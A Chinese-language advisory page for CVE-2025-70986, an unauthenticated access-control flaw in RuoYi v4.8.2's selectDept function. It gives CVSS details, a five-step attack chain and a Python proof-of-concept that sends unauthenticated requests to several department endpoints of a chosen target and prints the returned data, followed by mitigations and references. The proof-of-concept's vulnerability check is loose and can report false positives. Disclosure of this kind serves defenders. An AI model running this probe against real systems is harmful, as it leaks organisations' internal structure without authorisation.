CVE-2025-70986 | RuoYi v4.8.2 selectDept函数访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2025-70986

漏洞类型

访问控制不当

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

RuoYi v4.8.2

漏洞概述

CVE-2025-70986是若依(RuoYi)管理系统v4.8.2版本中的一个高危安全漏洞。该漏洞存在于系统的selectDept函数中，由于访问控制机制实现不当，攻击者可以在无需任何认证的情况下，通过构造特定的HTTP请求访问系统中的敏感部门数据。这意味着任何网络用户都能够获取系统中存储的部门架构信息、人员组织结构等机密数据。攻击者可能利用这些信息进行进一步的社会工程学攻击、横向移动或对系统进行更深层次的入侵。该漏洞的CVSS评分为7.5，属于高危级别，机密性影响为高，攻击复杂度低，无需认证和用户交互，对企业信息安全构成严重威胁。

技术细节

该漏洞的根本原因在于RuoYi v4.8.2系统中selectDept函数的访问控制验证不完善。在正常的业务逻辑中，获取部门信息应该需要相应的权限验证，确保只有授权用户才能访问敏感的组织架构数据。然而，该函数缺少必要的权限检查或权限验证逻辑存在缺陷，使得攻击者可以直接通过API端点访问本应受保护的部门数据。攻击者可以通过发送带有特定参数的HTTP GET或POST请求到selectDept函数对应的接口，在不携带任何有效认证凭证的情况下，即可获取系统中所有部门的详细信息，包括部门名称、部门编号、上下级关系等敏感数据。这种访问控制失效可能导致企业组织架构信息泄露，为后续攻击提供有价值的情报支持。

攻击链分析

STEP 1

步骤1

情报收集：攻击者识别目标网站使用若依(RuoYi)管理系统v4.8.2版本

STEP 2

步骤2

漏洞探测：攻击者尝试访问/system/dept/selectDept等API端点

STEP 3

步骤3

认证绕过：发送HTTP请求到selectDept函数，不携带任何认证凭证

STEP 4

步骤4

数据窃取：成功获取系统中的敏感部门数据，包括部门架构、组织结构信息

STEP 5

步骤5

信息利用：利用获取的部门数据进行进一步攻击，如社会工程学、横向移动等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-70986 PoC
# RuoYi v4.8.2 selectDept Function Access Control Vulnerability
# Target: RuoYi v4.8.2 - selectDept endpoint
# This PoC demonstrates unauthorized access to sensitive department data

def exploit_cve_2025_70986(target_url):
    """
    Exploit for CVE-2025-70986: Incorrect access control in selectDept function
    """
    # Common RuoYi endpoints for department data
    endpoints = [
        '/system/dept/selectDept',
        '/system/dept/list',
        '/system/dept/deptList',
        '/system/dept/getDeptTree',
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] CVE-2025-70986 Exploit - RuoYi selectDept Access Control Bypass")
    print("=" * 60)
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"\n[*] Testing endpoint: {endpoint}")
        
        try:
            # Send request without authentication
            response = requests.get(url, timeout=10, verify=False)
            
            if response.status_code == 200:
                # Check if sensitive data is returned
                if 'dept' in response.text.lower() or 'data' in response.text:
                    print(f"[+] VULNERABLE! Endpoint returned data without auth")
                    print(f"[+] Response preview: {response.text[:500]}...")
                    return True
                else:
                    print(f"[-] Endpoint accessible but no sensitive data")
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Endpoint properly protected")
            else:
                print(f"[-] Unexpected status code: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    
    print("\n[!] Exploitation completed. No vulnerable endpoints found.")
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_cve_2025_70986(target)

影响范围

RuoYi v4.8.2

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 使用网络层访问控制限制对管理接口的访问，仅允许受信任的IP地址访问；2) 在反向代理层实施认证机制；3) 监控和记录所有对部门数据接口的访问请求，及时发现异常访问行为；4) 考虑暂时禁用或限制selectDept相关接口的公开访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-70986
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-70986
3 Details https://www.cvedetails.com/cve/CVE-2025-70986/
4 VulDB https://vuldb.com/cve/CVE-2025-70986
5 Link https://gist.github.com/old6ma/779320a98f361c299ca024521cb72db6
6 Link https://gitee.com/y_project/RuoYi
7 Link https://gitee.com/y_project/RuoYi/issues/IDIDME
8 Link https://github.com/yangzongzhuan/RuoYi